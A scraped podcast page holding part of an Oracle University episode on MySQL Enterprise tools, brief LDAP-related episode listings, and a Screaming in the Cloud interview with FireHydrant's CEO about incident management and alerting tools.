MySQL tools, and another important one is MySQL Enterprise Backup, right?  Perside: MySQL Enterprise Backup is a powerful tool that offers online, non-blocking backup and recovery. It makes sure databases remain available and performs optimally during the backup process. It also includes advanced features, such as incremental and differential backup. Additionally, MySQL Enterprise Backup supports compression to reduce backups and encryptions to keep data secure. One of the standard capabilities of MySQL Enterprise Backup is its seamless integration with media management software, or MMS. This integration simplifies the process of managing and storing backups, ensuring that data is easily accessible and secure. Then we have the MySQL Workbench Enterprise. It enhances database development and design with robust tools for creating and managing your diagram and ensuring proper documentation. It simplifies data migration with powerful tools that makes it easy to move databases between platforms. For database administration, MySQL Workbench Enterprise offers efficient tools for monitoring, performance tuning, user management, and backup and recovery. MySQL Enterprise Monitor is another tool. It provides real-time MySQL performance and availability monitoring. It helps track database's health and performance. It visually finds and fixes problem queries. This is to make it easy to identify and address performance issues. It offers MySQL best-practice advisors to guide users in maintaining optimal performance and security. Lastly, MySQL Enterprise Monitor is proactive and it provides forecasting. 18:40 Lois: Oh that's really going to help users stay ahead of potential issues. That's fantastic! What about the Oracle Enterprise Manager Plugin for MySQL? Perside: This one offers availability and performance monitoring to make sure MySQL databases are running smoothly and efficiently. It provides configuration monitoring. This is to help keep track of the database settings and configuration. Finally, it collects all available metrics to provide comprehensive insight into the database operation. 19:19 Lois: Are there any tools designed to handle higher loads and improve security? Perside: MySQL Enterprise Thread Pool improves scalability as concurrent connections grows. It makes sure the database can handle increased loads efficiently. MySQL Enterprise Authentication is another tool. This one integrates MySQL with existing security infrastructures. It provides robust security solutions. It supports Linux PAM, LDAP, Windows, Kerberos, and even FIDO for passwordless authentication. 20:02 Nikita: Do any tools offer benefits like customized logging, data protection, database security? Perside: The MySQL Enterprise Audit provides out-of-the-box logging of connections, logins, and queries in XML or JSON format. It also offers simple to fine-grained policies for filtering and log rotation. This is to ensure comprehensive and customizable logging. MySQL Enterprise Firewall detects and blocks out of policy database transactions. This is to protect your data from unauthorized access and activities. We also have MySQL Enterprise Asymmetric Encryption. It uses MySQL encryption libraries for key management signing and verifying data. It ensures data stays secure during handling. MySQL Transparent Data Encryption, another tool, provides data-at-rest encryption within the database. The Master Key is stored outside of the database in a KMIP 1.1-compliant Key Vault. That is to improve database security. Finally, MySQL Enterprise Masking offers masking capabilities, including string masking and dictionary replacement. This ensures sensitive data is protected by obscuring it. It also provides random data generators, such as range-based, payment card, email, and social security number generators. These tools help create realistic but anonymized data for testing and development. 22:12 Lois: Can you tell us about HeatWave, the MySQL cloud service? We're going to have a whole episode dedicated to it soon, but just a quick introduction for now would be great. Perside: MySQL HeatWave offers a fully managed MySQL service. It provides deployment, backup and restore, high availability, resizing, and read replicas, all the features you need for efficient database management. This service is a powerful union of Oracle Infrastructure and MySQL Enterprise Edition 8. It combines robust performance with top-tier infrastructure. With MySQL HeatWave, your systems are always up to date with the latest security fixes, ensuring your data is always protected. Plus, it supports both OLTP and analytics/ML use cases, making it a versatile solution for diverse database needs. 23:22 Nikita: So to wrap up, what are your key takeways when it comes to MySQL? Perside: When you use MySQL, here is the bottom line. MySQL Enterprise Edition delivers unmatched performance at scale. It provides advanced monitoring and tuning capabilities to ensure efficient database operation, even under heavy loads. Plus, it provides insurance and immediate help when needed, allowing you to depend on expert support whenever an issue arises. Regarding total cost of ownership, TCO, this edition significantly reduces the risk of downtime and enhances productivity. This leads to significant cost savings and improved operational efficiency. On the matter of risk, MySQL Enterprise Edition addresses security and regulatory compliance. This is to make sure your data meets all necessary standards. Additionally, it provides direct contact with the MySQL team for expert guidance. In terms of DevOps agility, it supports automated scaling and management, as well as flexible real-time backups, making it ideal for agile development environments. Finally, concerning customer satisfaction, it enhances application performance and uptime, ensuring your customers have a reliable and smooth experience. 25:18 Lois: Thank you so much, Perside. This is really insightful information. To learn more about all the support services that are available, visit support.oracle.com. This is the central hub for all MySQL Enterprise Support resources.  Nikita: Yeah, and if you want to know about the key commercial products offered by MySQL, visit mylearn.oracle.com and search for the MySQL 8.4: Essentials course. Join us next week for a discussion on installing MySQL. Until then, this is Nikita Abraham… Lois: And Lois Houston signing off! 25:53 That's all for this episode of the Oracle University Podcast. If you enjoyed listening, please click Subscribe to get all the latest episodes. We'd also love it if you would take a moment to rate and review us on your podcast app. See you again on the next episode of the Oracle University Podcast.

ScanNetSecurity 最新セキュリティ情報
Okta、AD/LDAP委任認証にてユーザー名が52文字以上の場合における脆弱性を公表

ScanNetSecurity 最新セキュリティ情報

Play Episode Listen Later Nov 5, 2024 0:14


Okta Japan株式会社とOpenID Foundationは10月17日、SaaSアプリケーションの新たなアイデンティティセキュリティ標準「IPSIE」の策定に向けたワーキンググループの結成を発表した。

Anerzählt
LDAP 636 =^_^=

Anerzählt

Play Episode Listen Later Jun 3, 2024 7:23


Das LDAP Protokoll ist nur eines von vielen Netzwerkprotokollen und allen gemeinsam ist, dass sie über Netzwerkadresse und Port kommunizieren...

The PowerShell Podcast
From Python to PowerShell: A Developer's Perspective with Jordan Borean

The PowerShell Podcast

Play Episode Listen Later Jan 22, 2024 54:20


In this episode of the PowerShell Podcast, we are joined by the talented Jordan Borean. Join us as we delve into the world of PowerShell development with Jordan, exploring some of his exceptional modules that have made waves in the community. Jordan shares his unique perspective as a Python developer using PowerShell and highlights the benefits of binary modules. Dive into the details of Jordan's experience within the PowerShell community Discord, and gain insights into his journey to Red Hat, where Open Source played a pivotal role. As a bonus, discover the surprising answer to the question: If PowerShell was a song, what would it be? This episode is packed with coding wisdom, community adventures, and a touch of musical revelation.   Guest Bio and links: I've been working in IT for around 10 years now with experience in a range of roles. Currently, I'm a programmer working on Ansible for RedHat, specializing in Windows automation. While my job is mostly working with Python I play around with PowerShell and C# mostly in my spare time and have written quite a few PowerShell modules. In my spare time, I like to spend time with my wife and dog as well as go on some bike rides around where I live. I currently specialize in network protocols like WinRM, SMB, PSRemoting, LDAP, among others, and I have written a few cross-platform clients that implement these protocols outside of Windows. I'm also quite active in the Discord community and love to help/lurk the various questions that come up there. There's always something new that I learn.   Watch the PowerShell Podcast on YouTube: https://www.youtube.com/watch?v=iTFr1ojayTM https://2pintsoftware.com/news/details/why-is-add-content-bad-in-powershell-51 https://github.com/JustinGrote/ModuleFast/releases/tag/v0.1.0 https://lindnerbrewery.github.io/posts/converting_to_semtantic_version/   https://github.com/jborean93/PowerShell-ctypes https://github.com/jborean93/PSDetour https://github.com/jborean93/PSDetour-Hooks https://github.com/jborean93/PSEtw https://github.com/jborean93/PSOpenAD https://github.com/ansible-collections/ansible.windows https://github.com/ansible-collections/community.windows https://github.com/ansible-collections/microsoft.ad https://github.com/SeeminglyScience/ImpliedReflection https://github.com/JustinGrote/ModuleFast/ https://github.com/SeeminglyScience/ClassExplorerhttps://github.com/pester/Pester

Self-Hosted
114: Unintended Consequences

Self-Hosted

Play Episode Listen Later Jan 13, 2024 61:48


Nextcloud Upgrade, Android Tablet Experiment, Jellystat, OpenSSH 9.5, Audiobookshelf, StirlingPDF, Lubelog, Audiobookshelf, Tailscale Integration, Apple Notes Killer, Memos, Reverse Proxy, Zigbee Plugs Recommendation Sponsored By:Tailscale: Tailscale is a Zero config VPN. It installs on any device in minutes, manages firewall rules for you, and works from anywhere. Get 3 users and 100 devices for free. Support Self-HostedLinks:⚡ Grab Sats with Strike Around the World — Strike is a lightning-powered app that lets you quickly and cheaply grab sats in over 36 countries.

FOCUS ON: Linux
Linux im Windows-Käfig

FOCUS ON: Linux

Play Episode Listen Later Dec 13, 2023 19:01


Eine der Stärken von Linux ist es, verhältnismäßig einfach in bestehende Netzwerke integriert werden zu können. So gibt es beispielsweise mehrere Tools, um Linux-Hosts in Microsoft-Verzeichnisdiensten zu verwenden - und auch Microsofts eigene MDM-Lösung unterstützt inzwischen Linux. In puncto Enterprise Security haben wir auch einen Tipp parat.

Screaming in the Cloud
Creating Value in Incident Management with Robert Ross

Screaming in the Cloud

Play Episode Listen Later Dec 5, 2023 35:09


Robert Ross, CEO and Co-Founder at FireHydrant, joins Corey on Screaming in the Cloud to discuss how being an on-call engineer fighting incidents inspired him to start his own company. Robert explains how FireHydrant does more than just notify engineers of an incident, but also helps them to be able to effectively put out the fire. Robert tells the story of how he “accidentally” started a company as a result of a particularly critical late-night incident, and why his end goal at FireHydrant has been and will continue to be solving the problem, not simply choosing an exit strategy. Corey and Robert also discuss the value and pricing models of other incident-reporting solutions and Robert shares why he feels surprised that nobody else has taken the same approach FireHydrant has. About RobertRobert Ross is a recovering on-call engineer, and the CEO and co-founder at FireHydrant. As the co-founder of FireHydrant, Robert plays a central role in optimizing incident response and ensuring software system reliability for customers. Prior to founding FireHydrant, Robert previously contributed his expertise to renowned companies like Namely and Digital Ocean. Links Referenced: FireHydrant: https://firehydrant.com/ Twitter: https://twitter.com/bobbytables TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: Developers are responsible for more than ever these days. Not just the code they write, but also the containers and cloud infrastructure their apps run on. And a big part of that responsibility is app security — from code to cloud. That's where Snyk comes in. Snyk is a frictionless security platform that meets teams where they are, automating application security controls across their existing tools, workflows, and the AWS application stack — including seamless integrations with AWS CodePipeline, Amazon EKS, Amazon Inspector and several others. I'm a customer myself. Deploy on AWS. Secure with Snyk. Learn more at snyk.co/scream. That's S-N-Y-K-dot-C-O/scream.Corey: Welcome to Screaming in the Cloud, I'm Corey Quinn. And this featured guest episode is brought to us by our friends at FireHydrant and for better or worse, they've also brought us their CEO and co-founder, Robert Ross, better known online as Bobby Tables. Robert, thank you for joining us.Robert: Super happy to be here. Thanks for having me.Corey: Now, this is the problem that I tend to have when I've been tracking companies for a while, where you were one of the only people that I knew of at FireHydrant. And you kind of still are, so it's easy for me to imagine that, oh, it's basically your own side project that turned into a real job, sort of, side hustle that's basically you and maybe a virtual assistant or someone. I have it on good authority—and it was also signaled by your Series B—that there might be more than just you over there now.Robert: Yes, that's true. There's a little over 60 people now at the company, which is a little mind-boggling for me, starting from side projects, building this in Starbucks to actually having people using the thing and being on payroll. So, a little bit of a crazy thing for me. But yes, over 60.Corey: So, I have to ask, what is it you folks do? When you say ‘fire hydrant,' the first thing that I think I was when I was a kid getting yelled at by the firefighter for messing around with something I probably shouldn't have been messing around with.Robert: So, it's actually very similar where I started it because I was messing around with software in ways I probably shouldn't have and needed a fire hydrant to help put out all the fires that I was fighting as an on-call engineer. So, the name kind of comes from what do you need when you're putting out a fire? A fire hydrant. So, what we do is we help people respond to incidents really quickly, manage them from ring to retro. So, the moment you declare an incident, we'll do all the timeline tracking and eventually help you create a retrospective at the very end. And it's been a labor of love because all of that was really painful for me as an engineer.Corey: One of the things that I used to believe was that every company did something like this—and maybe they do, maybe they don't—I'm noticing these days an increasing number of public companies will never admit to an incident that very clearly ruined things for their customers. I'm not sure if they're going to talk privately to customers under NDAs and whatnot, but it feels like we're leaving an era where it was an expectation that when you had a big issue, you would do an entire public postmortem explaining what had happened. Is that just because I'm not paying attention to the right folks anymore, or are you seeing a downturn in that?Robert: I think that people are skittish of talking about how much reliability they—or issues they may have because we're having this weird moment where people want to open more incidents like the engineers actually want to say we have more incidents and officially declare those, and in the past, we had these, like, shadow incidents that we weren't officially going to say it was an incident, but was a pretty big deal, but we're not going to have a retro on it so it's like it didn't happen. And kind of splitting the line between what's a SEV1, when should we actually talk about this publicly, I think companies are still trying to figure that out. And then I think there's also opposing forces. We talk to folks and it's, you know, public relations will sometimes get involved. My general advice is, like, you should be probably talking about it no matter what. That's how you build trust.It's trust, with incidences, lost in buckets and gained back in drops, so you should be more public about it. And I think my favorite example is a major CDN had a major incident and it took down, like, the UK government website. And folks can probably figure out who I'm talking about, but their stock went up the next day. You would think that a major incident taking down a large portion of the internet would cause your stock to go down. Not the case. They were on it like crazy, they communicated about it like crazy, and lo and behold, you know, people were actually pretty okay with it as far as they could be at the end of the day.Corey: The honest thing that really struck me about that was I didn't realize that CDN that you're referencing was as broadly deployed as it was. Amazon.com took some downtime as a result of this.Robert: Yeah.Corey: It's, “Oh, wow. If they're in that many places, I should be taking them more seriously,” was my takeaway. And again, I don't tend to shame folks for incidents because as soon as you do that, they stopped talking about them. They still have them, but then we all lose the ability to learn from them. I couldn't help but notice that the week that we're recording this, so there was an incident report put out by AWS for a Lambda service event in Northern Virginia.It happened back in June, we're recording this late in October. So, it took them a little bit of time to wind up getting it out the door, but it's very thorough, very interesting as far as what it talks about as far as their own approach to things. Because otherwise, I have to say, it is easy as a spectator slash frustrated customer to assume the absolute worst. Like, you're sitting around there and like, “Well, we have a 15-minute SLA on this, so I'm going to sit around for 12 minutes and finish my game of solitaire before I answer the phone.” No, it does not work that way. People are scrambling behind the scenes because as systems get more complicated, understanding the interdependencies of your own system becomes monstrous.I still remember some of the very early production engineering jobs that I had where—to what you said a few minutes ago—oh, yeah, we'll just open an incident for every alert that goes off. Then we dropped a [core switch 00:05:47] and Nagio sent something like 8000 messages inside of two minutes. And we would still, 15 years later, not be done working through that incident backlog had we done such a thing. All of this stuff gets way harder than you would expect as soon as your application or environment becomes somewhat complicated. And that happens before you realize it.Robert: Yeah, much faster. I think that, in my experience, there's a moment that happens for companies where maybe it's the number of customers you have, number of servers you're running in production, that you have this, like, “Oh, we're running a big workload right now in a very complex system that impacts people's lives, frankly.” And the moment that companies realize that is when you start to see, like, oh, process change, you build it, you own it, now we have an SRE team. Like, there's this catalyst that happens in all of these companies that triggers this. And it's—I don't know, from my perspective, it's coming at a faster rate than people probably realize.Corey: From my perspective, I have to ask you this question, and my apologies in advance if it's one of those irreverent ones, but do you consider yourself to be an observability company?Robert: Oh, great question. No. No, actually. We think that we are the baton handoff between an observability tool and our platform. So, for example, we think that that's a good way to kind of, you know, as they say, monitor the system, give reports on that system, and we are the tool that based on that monitor may be going off, you need to do something about it.So, for example, I think of it as like a smoke detector in some cases. Like, in our world, like that's—the smoke detector is the thing that's kind of watching the system and if something's wrong, it's going to tell you. But at that point, it doesn't really do anything that's going to help you in the next phase, which is managing the incident, calling 911, driving to the scene of the fire, whatever analogies you want to use. But I think the value-add for the observability tools and what they're delivering for businesses is different than ours, but we touch each other, like, very much so.Corey: Managing an incident when something happens and diagnosing what is the actual root cause of it, so to speak—quote-unquote, “Root cause.” I know people have very strong opinions on—Robert: Yeah, say the word [laugh].Corey: —that phrase—exactly—it just doesn't sound that hard. It is not that complicated. It's, more or less, a bunch of engineers who don't know what they're actually doing, and why are they running around chasing this stuff down is often the philosophy of a lot of folks who have never been in the trenches dealing with these incidents themselves. I know this because before I was exposed to scale, that's what I thought and then, oh, this is way harder than you would believe. Now, for better or worse, an awful lot of your customers and the executives at those customers did, for some strange reason, not come up through production engineering as the thing that they've done. They are executives, so it feels like it would be a challenging conversation to have with them, but one thing that you've got in your back pocket, which I always love talking to folks about, is before this, you were an engineer and then you became a CEO of a reasonably-sized company. That is a very difficult transition. Tell me about it.Robert: Yeah. Yeah, so a little of that background. I mean, I started writing code—I've been writing code for two-thirds of my life. So, I'm 32 now; I'm relatively young. And my first job out of high school—skipping college entirely—was writing code. I was 18, I was working in a web dev shop, I was making good enough money and I said, you know what? I don't want to go to college. That sounds—I'm making money. Why would I go to college?And I think it was a good decision because I got to be able—I was right kind of in the centerpiece of when a lot of really cool software things were happening. Like, DevOps was becoming a really cool term and we were seeing the cloud kind of emerge at this time and become much more popular. And it was a good opportunity to see all this confluence of technology and people and processes emerge into what is, kind of like, the base plate for a lot of how we build software today, starting in 2008 and 2009. And because I was an on-call engineer during a lot of that, and building the systems as well, that I was on call for, it meant that I had a front-row seat to being an engineer that was building things that was then breaking, and then literally merging on GitHub and then five minutes later [laugh], seeing my phone light up with an alert from our alerting tool. Like, I got to feel the entire process.And I think that that was nice because eventually one day, I snapped. And it was after a major incident, I snapped and I said, “There's no tool that helps me during this incident. There's no tool that kind of helps me run a process for me.” Because the only thing I care about in the middle of the night is going back to bed. I don't have any other priority [laugh] at 2 a.m.So, I wanted to solve the problem of getting to the fire faster and extinguishing it by automating as much as I possibly could. The process that was given to me in an outdated Confluence page or Google Doc, whatever it was, I wanted to automate that part so I could do the thing that I was good at as an engineer: put out the fire, take some notes, and then go back to bed, and then do a retrospective sometime next day or in that week. And it was a good way to kind of feel the problem, try to build a solution for it, tweak a little bit, and then it kind of became a company. I joke and I say on accident, actually.Corey: I'll never forget one of the first big, hairy incidents that I had to deal with in 2009, where my coworker had just finished migrating the production environment over to LDAP on a Thursday afternoon and then stepped out for a three-day weekend, and half an hour later, everything started exploding because LDAP will do that. And I only had the vaguest idea of how LDAP worked at all. This was a year into my first Linux admin job; I'd been a Unix admin before that. And I suddenly have the literal CEO of the company breathing down my neck behind me trying to figure out what's going on and I have no freaking idea of myself. And it was… feels like there's got to be a better way to handle these things.We got through. We wound up getting it back online, no one lost their job over it, but it was definitely a touch-and-go series of hours there. And that was a painful thing. And you and I went in very different directions based upon experiences like that. I took a few more jobs where I had even worse on-call schedules than I would have believed possible until I started this place, which very intentionally is centered around a business problem that only exists during business hours. There is no 2 a.m. AWS billing emergency.There might be a security issue masquerading as one of those, but you don't need to reach me out of business hours because anything that is a billing problem will be solved in Seattle's timeline over a period of weeks. You leaned into it and decided, oh, I'm going to start a company to fix all of this. And okay, on some level, some wit that used to work here, wound up once remarking that when an SRE doesn't have a better idea, they start a monitoring company.Robert: [laugh].Corey: And, on some level, there's some validity to it because this is the problem that I know, and I want to fix it. But you've differentiated yourself in a few key ways. As you said earlier, you're not an observability company. Good for you.Robert: Yeah. That's a funny quote.Corey: Pete Cheslock. He has a certain way with words.Robert: Yeah [laugh]. I think that when we started the company, it was—we kind of accidentally secured funding five years ago. And it was because this genuinely was something I just, I bought a laptop for because I wanted to own the IP. I always made sure I was on a different network, if I was going to work on the company and the tool. And I was just writing code because I just wanted to solve the problem.And then some crazy situation happened where, like, an investor somehow found FireHydrant because they were like, “Oh, this SRE thing is a big space and incidents is a big part of it.” And we got to talking and they were like, “Hey, we think what you're building is valuable and we think you should build a company here.” And I was—like, you know, the Jim Carrey movie, Yes Man? Like, that was kind of me in that moment. I was like, “Sure.” And here we are five years later. But I think the way that we approached the problem was let's just solve our own problem and let's just build a company that we want to work at.And you know, I had two co-founders join me in late 2018 and that's what we told ourselves. We said, like, “Let's build a company that we want to work for, that solves problems that we have had, that we care about solving.” And I think it's worked out, you know? We work with amazing companies that use our tool—much to their chagrin [laugh]—multiple times a day. It's kind of a problem when you build an incident response tool is that it's a good thing when people are using it, but a bad thing for them.Corey: I have to ask of all of the different angles to approach this from, you went with incident management as opposed to focusing on something that is more purely technical. And I don't say that in any way that is intended to be sounding insulting, but it's easier from an engineering mind to—having been one myself—to come up with, “Here's how I make one computer talk to his other computer when the following event happens.” That's a much easier problem by orders of magnitude than here's how I corral the humans interacting with that computer's failure to talk to another computer in just the right way. How did you get onto this path?Robert: Yeah. The problem that we were trying to solve for it was the getting the right people in the room problem. We think that building services that people own is the right way to build applications that are reliable and stable and easier to iterate on. Put the right people that build that software, give them, like, the skin in the game of also being on call. And what that meant for us is that we could build a tool that allowed people to do that a lot easier where allowing people to corral the right people by saying, “This service is broken, which powers this functionality, which means that these are the people that should get involved in this incident as fast as possible.”And the way we approached that is we just built up part of our functionality called Runbooks, where you can say, “When this happens, do this.” And it's catered for incidents. So, there's other tools out there, you can kind of think of as, like, we're a workflow tool, like Zapier, or just things that, like, fire webhooks at services you build and that ends up being your incident process. But for us, we wanted to make it, like, a really easy way that a project manager could help define the process in our tool. And when you click the button and say, “Declare Incident: LDAP is Broken,” and I have a CEO standing behind me, our tool just would corral the people for you.It was kind of like a bat signal in the air, where it was like, “Hey, there's this issue. I've run all the other process. I just need you to arrive at and help solve this problem.” And we think of it as, like, how can FireHydrant be a mech suit for the team that owns incidents and is responsible for resolving them?Corey: There are a few easier ways to make a product sound absolutely ridiculous than to try and pitch it to a problem that it is not designed to scale to. What is the ‘you must be at least this tall to ride' envisioning for FireHydrant? How large slash complex of an organization do you need to be before this starts to make sense? Because I promise, as one person with a single website that gets no hits, that is probably not the best place for—Robert: Probably not.Corey: To imagine your ideal user persona.Robert: Well, I'm sure you get way more hits than that. Come on [laugh].Corey: It depends on how controversial I'm being in a given week.Robert: Yeah [laugh].Corey: Also, I have several ridiculous, nonsense apps out there, but honestly, those are for fun. I don't charge people for them, so they can deal with my downtime till I get around to it. That's the way it works.Robert: Or, like, spite-visiting your website. No it's—for us, we think that the ‘must be this tall' is when do you have, like, sufficiently complicated incidents? We tell folks, like, if you're a ten-person shop and you have incidents, you know, just use our free tier. Like, you need something that opens a Slack channel? Fine. Use our free tier or build something that hits the Slack API [unintelligible 00:18:18] channel. That's fine.But when you start to have a lot of people in the room and multiple pieces of functionality that can break and multiple people on call, that's when you probably need to start to invest in incident management. Because it is a return on investment, but there is, like, a minimum amount of incidents and process challenges that you need to have before that return on investment actually, I would say, comes to fruition. Because if you do think of, like, an incident that takes downtime, or you know, you're a retail company and you go down for, let's say, ten minutes, and your number of sales per hour is X, it's actually relatively simple for that type of company to understand, okay, this is how much impact we would need to have from an incident management tool for it to be valuable. And that waterline is actually way—it's way lower than I think a lot of people realize, but like you said, you know, if you have a few 100 visitors a day, it's probably not worth it. And I'll be honest there, you can use our free tier. That's fine.Corey: Which makes sense. It's challenging to wind up-sizing things appropriately. Whenever I look at a pricing page, there are two things that I look for. And incidentally, when I pull up someone's website, I first make a beeline for pricing because that is the best way I found for a lot of the marketing nonsense words to drop away and it get down to brass tacks. And the two things I want are free tier or zero-dollar trial that I can get started with right now because often it's two in the morning and I'm trying to see if this might solve a problem that I'm having.And I also look for the enterprise tier ‘contact us' because there are big companies that do not do anything that is not custom nor do they know how to sign a check that doesn't have two commas in it. And whatever is between those two, okay, that's good to look at to figure out what dimensions I'm expected to grow on and how to think about it, but those are the two tent poles. And you've got that, but pricing is always going to be a dark art. What I've been seeing across the industry. And if we put it under the broad realm of things that watch your site and alert you and help manage those things, there are an increasing number of, I guess what I want to call component vendors, where you'll wind up bolting together a couple dozen of these things together into an observability pipeline-style thing, and each component seems to be getting extortionately expensive.Most of the wake-up-in-the-middle-of-the-night services that will page you—and there are a number of them out there—at a spot check of these, they all cost more per month per user than Slack, the thing that most of us to end up living within. This stuff gets fiendishly expensive, fiendishly quickly, and at some point, you're looking at this going, “The outage is cheaper than avoiding the outage through all of these things. What are we doing here?” What's going on in the industry, other than ‘money printing machine stopped going brrr' in quite the same way?Robert: Yeah, I think that for alerting specifically, this is a big part of, like, the journey that we wanted to have in FireHydrant was like, we also want to help folks with the alerting piece. So, I'll focus on that, which is, I think that the industry around notifying people for incidents—texts, call, push notifications, emails, there's a bunch of different ways to do it—I think where it gets really crazy expensive as in this per-seat model that most of them seem to have landed on. And we're per-seat for, like, the core platform of FireHydrant—so you know, before people spite-visit FireHydrant, look at our pricing pitch—but we're per-seat there because the value there is, like, we're the full platform for the service catalog retrospectives, Runbooks, like, there's a whole other component of FireHydrant—status pages—but when it comes to alerting, like, in my opinion, that should be active user for a few reasons. I think that if you're going to have people responding to incidents and the value from us is making sure they get to that incident very quickly because we wake them up in the middle of the night, we text them, we call them we make their Hue lights turn red, whatever it is, then that's, like, the value that we're delivering at that moment in time, so that's how we should probably invoice you.And I think that what's happened is that the pricing for these companies, they haven't innovated on the product in a way that allows them to package that any differently. So, what's happened, I think, is that the packaging of these products has been almost restrictive in the way that they could change their pricing models because there's nothing much more to package on. It's like, cool there's an alerting aspect to this, but that's what people want to buy those tools for. They want to buy the tool so it wakes them up. But that tool is getting more expensive.There was even a price increase announced today for a big one [laugh] that I've been publicly critical of. That is crazy expensive for a tool that texts you and call you. And what peo—what's going on now are people are looking, they're looking at the pricing sheet for Twilio and going, “What the heck is going on?” Like, I—to send a text on Twilio in the United States is fractions of a penny and here we are paying $40 a user for that person to receive six texts that month because of a webhook that hit an HCP server and, like, it's supposed to call that person? That's kind of a crazy model if you think about it. Like, engineers are kind of going, “Wait a minute. What's up here?” Like, and when engineers start thinking, “I could build this on a weekend,” like, something's wrong, like, with that model. And I think that people are starting to think that way.Corey: Well engineers, to be fair, will think that about an awful lot of stuff.Robert: Anything. Yeah, they [laugh]—Corey: I've heard it said about Dropbox, Facebook, the internet—Robert: Oh, Dropbox is such a good one.Corey: BGP. Yeah okay, great. Let me know how that works out for you.Robert: What was that Dropbox comment on Hacker News years ago? Like, “Just set up NFS and host it that way and it's easy.” Right?Corey: Or rsync. Yeah—Robert: Yeah, it was rsync.Corey: What are you going to make with that? Like, who's going to buy that? Like, basically everyone for at least a time.Robert: And whether or not the engineers are right, I think is a different point.Corey: It's the condescension dismissal of everything that isn't writing the code that really galls, on some level.Robert: But I think when engineers are thinking about, like, “I could build this on a weekend,” like, that's a moment that you have an opportunity to provide the value in an innovative, maybe consolidated way. We want to be a tool that's your incident management ring to retro, right? You get paged in the middle of the night, we're going to wake you up, and when you open up your laptop, groggy-eyed, and like, you're about to start fighting this fire, FireHydrant's already done a lot of work. That's what we think is, like, the right model do this. And candidly, I have no idea why the other alerting tools in this space haven't done this. I've said that and people tend to nod in agreement and say like, “Yeah, it's been—it's kind of crazy how they haven't approached this problem yet.” And… I don't know, I want to solve that problem for folks.Corey: So, one thing that I have to ask, you've been teasing on the internet for a little bit now is something called Signals where you are expanding your product into the component that wakes people up in the middle of the night, which in isolation, fine, great, awesome. But there was a company whose sole stated purpose was to wake people up in the middle of the night, and then once they started doing some business things such as, oh I don't know, going public, they needed to expand beyond that to do a whole bunch of other things. But as a customer, no, no, no, you are the thing that wakes me up in the middle of the night. I don't want you to sprawl and grow into everything else because if you're going to have to pick a vendor that claims to do everything, well, I'll just stay with AWS because they already do that and it's one less throat to choke. What is that pressure that is driving companies that are spectacular at the one thing to expand into things that frankly, they don't have the chops to pull off? And why is this not you doing the same thing?Robert: Oh, man. The end of that question is such a good one and I like that. I'm not an economist. I'm not—like, that's… I don't know if I have a great comment on, like, why are people expanding into things that they don't know how to do. It seems to be, like, a common thing across the industry at a certain point—Corey: Especially particularly generative AI. “Oh, we've been experts in this for a long time.” “Yeah, I'm not that great at dodgeball, but you also don't see me mouthing off about how I've been great at it and doing it for 30 years, either.”Robert: Yeah. I mean, there was a couple ads during football games I watched. I'm like, “What is this AI thing that you just, like, tacked on the letter X to the end of your product line and now all of a sudden, it's AI?” I have plenty of rants that are good for a cocktail at some point, but as for us, I mean, we knew that we wanted to do alerting a long time ago, but it does have complications. Like, the problem with alerting is that it does have to be able to take a brutal punch to the face the moment that AWS us-east-2 goes down.Because at that moment in time, a lot of webhooks are coming your way to wake somebody up, right, for thousands of different companies. So, you do have to be able to take a very, very sufficient amount of volume instantaneously. So, that was one thing that kind of stopped us. In 2019 even, we wrote a product document about building an alerting tool and we kind of paused. And then we got really deep into incident management, and the thing that makes us feel very qualified now is that people are actually already integrating their alerting tools into FireHydrant today. This is a very common thing.In fact, most people are paying for a FireHydrant and an alerting tool. So, you can imagine that gets a little expensive when you have both. So, we said, well, let's help folks consolidate, let's help folks have a modern version of alerting, and let's build on top of something we've been doing very well already, which is incident management. And we ended up calling it Signals because we think that we should be able to receive a lot of signals in, do something correct with them, and then put a signal out and then transfer you into incident management. And yeah, we're are excited for it actually. It's been really cool to see it come together.Corey: There's something to be said for keeping it in a certain area of expertise. And people find it very strange when they reach out to my business partner and me asking, okay, so are you going to expand into Google Cloud or Azure or—increasingly, lately—Datadog—which has become a Fortune 500 board-level expense concern, which is kind of wild to me, but here we are—and asking if we're going to focus on that, and our answer is no because it's very… well, not very, but it is relatively easy to be the subject matter expert in a very specific, expensive, painful problem, but as soon as you start expanding that your messaging loses focus and it doesn't take long—since we do you view this as an inherent architectural problem—where we're saying, “We're the best cloud engineers and cloud architects in the world,” and then we're competing against basically everyone out there. And it costs more money a year for Accenture or Deloitte's marketing budget than we'll ever earn as a company in our entire lifetime, just because we are not externally boosted, we're not putting hundreds of people into the field. It's a lifestyle business that solves an expensive, painful problem for our customers. And that focus lends clarity. I don't like the current market pressure toward expansion and consolidation at the cost of everything, including it seems, customer trust.Robert: Yeah. That's a good point. I mean, I agree. I mean, when you see a company—and it's almost getting hard to think about what a company does based on their name as well. Like, names don't even mean anything for companies anymore. Like Datadog has expanded into a whole lot of things beyond data and if you think about some of the alerting tools out there that have names of, like, old devices that used to attach to our hips, that's just a different company name than what represents what they do.And I think for us, like, incidents, that's what we care about. That's what I know. I know how to help people manage incidents. I built software that broke—sometimes I was an arsonist—sometimes I was a firefighter, it really depends, but that's the thing that we're going to be good at and we're just going to keep building in that sphere.Corey: I think that there's a tipping point that starts to become pretty clear when companies focus away from innovating and growing and serving customers into revenue protection mode. And I think this is a cyclical force that is very hard to resist. But I can tell even having conversations like this with folks, when the way that a company goes about setting up one of these conversations with me, you came by yourself, not with a squadron of PR people, not with a whole giant list of talking points you wanted to go to, just, “Let's talk about this stuff. I'm interested in it.”As a company grows, that becomes more and more uncommon. Often, I'll see it at companies a third the size of yours, just because there's so much fear around everything we say must be spoken in such a way that it could never be taken in a negative way against us. That's not the failure mode. The failure mode is that no one listens to you or cares what you have to say. At some point, yeah, I get the shift, but damned if it doesn't always feel like it's depressing.Robert: Yeah. This is such great questions because I think that the way I think about it is, I care about the problem and if we solve the problem and we solve it well and people agree with us on our solution being a good way to solve that problem, then the revenue, like, happens because of that. I've gotten asked from, like, from VCs and customers, like, “What's your end goal with FireHydrant as the CEO of the company?” And what they're really asking is, like, “Do you want to IPO or be acquired?” That's always a question every single time.And my answer is, maybe, I don't know, philosophical, but it's, I think if we solve the problem, like, one of those will happen, but that's not the end goal. Because if I aim at that, we're going to come up short. It's like how they tell you to throw a ball, right? Like they don't say, aim at the glove. 